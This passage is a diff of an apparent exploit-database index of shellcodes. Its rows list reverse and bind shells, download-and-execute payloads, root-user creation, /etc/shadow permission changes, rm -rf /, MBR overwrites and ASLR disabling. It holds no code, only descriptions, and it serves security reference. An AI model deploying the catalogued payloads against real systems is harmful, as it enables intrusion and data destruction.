+13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid() + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86 13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86 13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 -13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 +13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) + Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86 13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86 @@ -57,7 +57,7 @@ id,file,description,date,author,type,platform 13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips 13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips 13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc -13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc +13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read() + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc 13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc 13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc @@ -85,17 +85,17 @@ id,file,description,date,author,type,platform 13327,shellcodes/linux_x86/13327.c,"Linux/x86 - reboot() + PUSH Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86 13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator 13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 -13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 +13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key To /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86 13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86 13334,shellcodes/linux_x86/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,shellcode,linux_x86 13335,shellcodes/linux_x86/13335.c,"Linux/x86 - iopl(3) + asm(cli) + while(1){} Shellcode (12 bytes)",2008-09-17,dun,shellcode,linux_x86 13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86 -13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86 +13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse (140.115.53.35:9999/TCP) + Download File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86 13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86 13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86 -13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86 +13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86 13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86 13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86 13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86 @@ -135,7 +135,7 @@ id,file,description,date,author,type,platform 13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 13378,shellcodes/linux_x86/13378.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 13379,shellcodes/linux_x86/13379.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86 -13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86 +13380,shellcodes/linux_x86/13380.c,"Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive + Payload Loader Shellcode (68+ bytes)",2006-03-12,izik,shellcode,linux_x86 13381,shellcodes/linux_x86/13381.c,"Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)",2006-02-07,phar,shellcode,linux_x86 13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86 13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86 @@ -185,7 +185,7 @@ id,file,description,date,author,type,platform 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86 13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86 -13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86 13432,shellcodes/linux_x86/13432.c,"Linux/x86 - Execute At Shared Memory Shellcode (50 bytes)",2004-09-26,sloth,shellcode,linux_x86 13433,shellcodes/linux_x86/13433.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)",2004-09-26,UnboundeD,shellcode,linux_x86 @@ -294,7 +294,7 @@ id,file,description,date,author,type,platform 13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86 13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86 13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows -13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 +13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86 13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86 13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86 @@ -305,7 +305,7 @@ id,file,description,date,author,type,platform 13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86 13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86 13578,shellcodes/linux_x86/13578.asm,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86 -13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86 +13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No Password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86 13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows 13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows 13586,shellcodes/linux_x86/13586.asm,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86 @@ -349,7 +349,7 @@ id,file,description,date,author,type,platform 13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86 13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86 13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86 -13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 +13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) With umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86 13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86 13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86 @@ -376,22 +376,22 @@ id,file,description,date,author,type,platform 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86 13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 -13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 +13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod (/etc/passwd 0777) + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64 14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator 14116,shellcodes/arm/14116.c,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm 14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows 14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm 14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86 -14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm -14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm +14142,shellcodes/arm/14142.c,"Linux/ARM - chmod(/etc/shadow 0777) + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm +14122,shellcodes/arm/14122.c,"Linux/ARM - chmod(/etc/shadow 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm 14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows -14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 +14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + Polymorphic + XOR Encoded Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86 @@ -410,7 +410,7 @@ id,file,description,date,author,type,platform 15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind (68/UDP) Listener + Reverse (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm -15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm 15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx @@ -419,12 +419,12 @@ id,file,description,date,author,type,platform 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 -17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 +17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod (/etc/shadow 0666) + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx 17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 -17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator +17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute Via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4 17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 @@ -453,7 +453,7 @@ id,file,description,date,author,type,platform 24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows 25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware -27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips +27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system(telnetd -l /bin/sh) Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips 27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm 40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86 28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86 @@ -464,23 +464,23 @@ id,file,description,date,author,type,platform 33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows 34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86 -34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 +34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid() + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 -34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86 +34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) To /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86 35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86 35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 -35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86 35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips -36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator -36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips -36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips +36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using PowerShell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator +36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod(/etc/shadow 666) Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips +36276,shellcodes/linux_mips/36276.c,"Linux/MIPS 